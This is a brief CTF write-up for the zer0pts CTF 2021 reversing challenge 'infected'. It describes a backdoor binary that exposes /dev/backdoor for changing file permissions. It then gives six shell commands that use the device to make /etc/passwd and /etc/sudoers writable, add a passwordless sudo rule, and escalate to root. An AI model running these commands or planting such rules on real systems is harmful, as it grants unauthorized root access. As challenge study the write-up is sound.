Try   HackMD

infected - zer0pts CTF 2021

tags: zer0pts CTF 2021 reversing

overview

We were given a backdoor binary. At first glance we can see some CUSE functions. It is easy to analyze that creates character device /dev/backdoor and the device changes file permission according to input b4ckd00r:<file path>:<permission>

The remained is the shell things. We want to see contents of /root with arbitrary file read / write (because we can change arbitrary file's permission to 777).

To see in the /root, we should become the root user. The easist way to be root is using su. So our purpose is to execute su or sudo su.

solution

We can solve this problem with the following commands:

  1. echo 'b4ckd00r:/etc/passwd:511' > /dev/backdoor
  2. echo tako:x:1000:1000:tako:/home:/bin/bash >> /etc/passwd
  3. echo 'b4ckd00r:/etc/sudoers:551' > /dev/backdoor
  4. echo 'ALL ALL=NOPASSWD: ALL' >> /etc/sudoers
  5. echo 'b4ckd00r:/etc/sudoers:288' > /dev/backdoor
  6. sudo /bin/su

Then done